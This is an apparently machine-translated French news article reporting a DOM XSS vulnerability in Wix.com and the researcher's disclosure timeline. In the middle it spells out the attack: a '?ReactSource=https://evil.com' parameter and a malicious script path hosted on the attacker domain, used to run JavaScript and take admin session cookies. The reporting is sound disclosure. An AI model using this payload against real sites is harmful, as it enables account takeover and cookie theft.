Accueil > Nouvelles Cyber > Bogue XSS détecté sur la plate-forme Wix.com, Construit sur Open-Source WordPress Bibliothèque
CYBER NOUVELLES

XSS Bug Trouvé sur la plate-forme Wix.com, Construit sur Open-Source WordPress Bibliothèque

par   |  Last Update:  |  0 Commentaires  

vulnérabilité-stforum

Avez-vous entendu parler de wix(.)avec?

Wix.com est une plate-forme de développement web basé sur un nuage conçu pour les utilisateurs de construire des sites web HTML5 et sites mobiles grâce à l'utilisation de ligne glisser-déposer des outils de l'entreprise.

Malheureusement, un bug XSS grave a été découvert sur la plate-forme mettant en danger actuellement des millions de sites Web et les utilisateurs.

en relation: TeslaCrypt Propagation via Compromised WordPress Pages

Wix(.)com a un bug XSS grave, chercheur dit

Tel que rapporté par les chercheurs en sécurité, le service accueille des millions de sites Web avec 87 millions d'utilisateurs enregistrés. La partie effrayante est que tous les utilisateurs sont actuellement sujettes à cette vulnérabilité XSS. Ce dernier peut être déployé par des attaquants d'une manière de ver de prendre en charge les comptes d'administrateur. Une fois cela fait, les attaquants obtenir le plein contrôle sur les sites Web compromis.

La vulnérabilité XSS a été décrit par Matt Austin de sécurité de contraste. Il a écrit:

Wix.com a une vulnérabilité XSS DOM sévère qui permet un contrôle complet de l'attaquant sur un site Web hébergé chez Wix. Tout simplement en ajoutant un seul paramètre à tout site créé sur Wix, l'attaquant peut provoquer leur JavaScript doit être chargé et exécuté dans le cadre du site cible.

Une simple ligne de code suffit à déclencher le bug

L'attaque peut être déclenchée que par l'ajout d'une commande de redirection simple à une URL de wix(.)avec. Le résultat est redirigé vers JavaScrip malveillants. Voir un exemple ci-dessous:

  • Ajouter: ?ReactSource = https://evil.com à une URL pour un site créé sur wix.com.
  • Assurez-vous que evil.com héberge un fichier malveillant à /packages-bin/wixCodeInit/wixCodeInit.min.js

Ces simples lignes de code suffisent pour les attaquants afin d'être sûr que leur JS est chargé et activé dans le cadre du site Web ciblé, explique le chercheur. Les attaquants sont également en mesure d'accéder aux cookies et les ressources de la session admin, un très mauvais scénario bien. Chaque fois qu'un cookie de session est récolté, les attaquants peuvent librement positionner les DOM XSS dans un iframe. Ceci est fait pour héberger du contenu malveillant sur un site Web administré par un opérateur.

En cas de succès, cette attaque peut être mis à profit pour la distribution de logiciels malveillants, site modification, l'exploitation minière de crypto-monnaie, modifier les informations de compte, etc.

Qu'est-ce que Wix dit?

En ce qui concerne la communication avec wix(.)avec, les actions des chercheurs l'expérience suivante:

Octobre 10: Crée ticket de support demandant un contact de sécurité
Octobre 11: Tendez la main à @wix sur twitter pour trouver un contact de sécurité. Répondit utiliser support standard. Gave détails dans le billet créé. page Ticket ne fonctionne plus. https://www.wix.com/support/html5/contact.
Octobre 14: Reçu norme "Nous enquêtons sur la question et ferons un suivi le plus tôt possible" réponse de Wix.
Octobre 20: Répondre à un billet demandant une mise à jour. (pas de réponse)
Octobre 27: Deuxième demande d'une mise à jour. (pas de réponse)

Sur Octobre 28, le chercheur a finalement reçu un répondre qui a déclaré que le

groupe que vous avez essayé de contacter (sécurité) peut ne pas exister, ou vous ne pouvez pas avoir l'autorisation d'envoyer des messages au groupe.

Cependant, le PDG de Wix Avishai Abrahami a finalement admis que certains aspects de la plate-forme sont basés sur la bibliothèque open-source WordPress. Il affirme que tout ce qui a été amélioré a été libéré à la communauté, rapporte ZDNet.

Milena Dimitrova

Un écrivain et gestionnaire de contenu inspiré qui travaille avec SensorsTechForum depuis le début du projet. Un professionnel avec 10+ années d'expérience dans la création de contenu engageant. Axé sur la vie privée des utilisateurs et le développement des logiciels malveillants, elle croit fermement dans un monde où la cybersécurité joue un rôle central. Si le bon sens n'a pas de sens, elle sera là pour prendre des notes. Ces notes peuvent se tourner plus tard dans les articles! Suivre Milena @Milenyim

Plus de messages

Suivez-moi:
Gazouillement

Articles Similaires:
  1. Suppression d'Oct Ransomware Oct Ransomware The Oct is а ransomware infection that has...
  2. 6 Tactics Cybersécurité pour se protéger contre les attaques XSS Cross-site scripting (XSS) est rien à prendre à la légère. As simultaneously...
  3. Un Bug XSS Trouvé (et fixe) en Photos.Facebook.com We all love Facebook but do we know how safe...
  4. Abandonné pour le plugin Panier WooCommerce WordPress Exploited dans les attaques Unpatched versions of the Abandoned Cart for WooCommerce plugin for...
  5. Yahoo Juste fixe Un autre bug XSS Effrayant Security experts definitely shiver every time a multinational company is...
  6. Communiqués Google 2 Nouveau Dev outils de protection contre XSS Google has just released two new tools for developers with...
  7. All in One SEO Pack de vulnérabilité WordPress Plugin pourrait permettre des attaques XSS All in One SEO Pack est l'un des plus ...
  8. Utiliser avec précaution: 7 Places en ligne communs Pourtant, dangereux en 2019 Quelques années en arrière, à 2016, nous avons décidé d'analyser...

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont marqués *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our politique de confidentialité.
Je suis d'accord